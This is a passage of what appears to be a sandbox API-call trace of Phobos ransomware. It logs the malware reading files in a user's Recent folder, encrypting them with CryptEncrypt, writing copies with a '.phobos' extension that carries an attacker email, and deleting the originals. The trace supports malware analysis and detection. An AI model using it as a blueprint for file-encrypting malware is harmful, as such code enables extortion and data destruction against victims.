HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ucGz58Fk.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ucgz58fk.lnk")) returned 0x20 [0201.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ucGz58Fk.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ucgz58fk.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ucGz58Fk.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ucgz58fk.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.548] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.548] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ucGz58Fk.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ucgz58fk.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.549] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.549] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.549] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe73, lpOverlapped=0x0) returned 1 [0201.550] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe80, dwBufLen=0xe80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe80) returned 1 [0201.550] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe80, lpOverlapped=0x0) returned 1 [0201.551] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0201.551] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.551] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.551] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.551] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.551] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.551] CloseHandle (hObject=0x124) returned 1 [0201.551] CloseHandle (hObject=0x178) returned 1 [0201.551] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ucGz58Fk.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ucgz58fk.lnk")) returned 1 [0201.552] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uFUu.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ufuu.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.553] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2545) returned 1 [0201.553] CloseHandle (hObject=0x178) returned 1 [0201.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uFUu.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ufuu.lnk")) returned 0x20 [0201.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uFUu.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ufuu.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uFUu.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ufuu.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.553] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.553] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uFUu.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ufuu.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.554] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.554] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.554] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x9f1, lpOverlapped=0x0) returned 1 [0201.555] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa00, dwBufLen=0xa00 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa00) returned 1 [0201.555] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa00, lpOverlapped=0x0) returned 1 [0201.556] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0201.556] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.556] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.556] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.556] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.556] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.556] CloseHandle (hObject=0x178) returned 1 [0201.556] CloseHandle (hObject=0x124) returned 1 [0201.557] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uFUu.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ufuu.lnk")) returned 1 [0201.557] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uk6Qo-ok7CDEt9a.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uk6qo-ok7cdet9a.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.558] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1035) returned 1 [0201.559] CloseHandle (hObject=0x124) returned 1 [0201.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uk6Qo-ok7CDEt9a.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uk6qo-ok7cdet9a.lnk")) returned 0x20 [0201.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uk6Qo-ok7CDEt9a.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uk6qo-ok7cdet9a.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uk6Qo-ok7CDEt9a.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uk6qo-ok7cdet9a.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.559] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.560] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uk6Qo-ok7CDEt9a.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uk6qo-ok7cdet9a.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.560] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.560] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.560] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x40b, lpOverlapped=0x0) returned 1 [0201.562] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x410, dwBufLen=0x410 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x410) returned 1 [0201.562] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x410, lpOverlapped=0x0) returned 1 [0201.562] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0201.562] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.562] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.562] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.563] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.563] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.563] CloseHandle (hObject=0x124) returned 1 [0201.563] CloseHandle (hObject=0x178) returned 1 [0201.563] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uk6Qo-ok7CDEt9a.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uk6qo-ok7cdet9a.lnk")) returned 1 [0201.564] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UNHUgpf_3pl-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\unhugpf_3pl-.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.564] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3908) returned 1 [0201.564] CloseHandle (hObject=0x178) returned 1 [0201.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UNHUgpf_3pl-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\unhugpf_3pl-.lnk")) returned 0x20 [0201.565] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UNHUgpf_3pl-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\unhugpf_3pl-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UNHUgpf_3pl-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\unhugpf_3pl-.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.565] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.565] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UNHUgpf_3pl-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\unhugpf_3pl-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.566] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.566] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.566] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf44, lpOverlapped=0x0) returned 1 [0201.567] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf50, dwBufLen=0xf50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf50) returned 1 [0201.567] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf50, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf50, lpOverlapped=0x0) returned 1 [0201.568] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0201.568] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.568] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.568] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.568] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.568] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.568] CloseHandle (hObject=0x178) returned 1 [0201.568] CloseHandle (hObject=0x124) returned 1 [0201.568] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UNHUgpf_3pl-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\unhugpf_3pl-.lnk")) returned 1 [0201.569] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uw9MMlJNvm.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uw9mmljnvm.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.570] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=579) returned 1 [0201.570] CloseHandle (hObject=0x124) returned 1 [0201.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uw9MMlJNvm.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uw9mmljnvm.mkv.lnk")) returned 0x20 [0201.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uw9MMlJNvm.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uw9mmljnvm.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uw9MMlJNvm.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uw9mmljnvm.mkv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.570] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.570] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uw9MMlJNvm.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uw9mmljnvm.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.571] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.571] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.571] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x243, lpOverlapped=0x0) returned 1 [0201.572] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x250, dwBufLen=0x250 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x250) returned 1 [0201.572] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x250, lpOverlapped=0x0) returned 1 [0201.572] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0201.572] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.572] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.572] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.572] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.573] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.573] CloseHandle (hObject=0x124) returned 1 [0201.573] CloseHandle (hObject=0x178) returned 1 [0201.573] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Uw9MMlJNvm.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\uw9mmljnvm.mkv.lnk")) returned 1 [0201.573] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V7ey.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\v7ey.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.574] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3477) returned 1 [0201.574] CloseHandle (hObject=0x178) returned 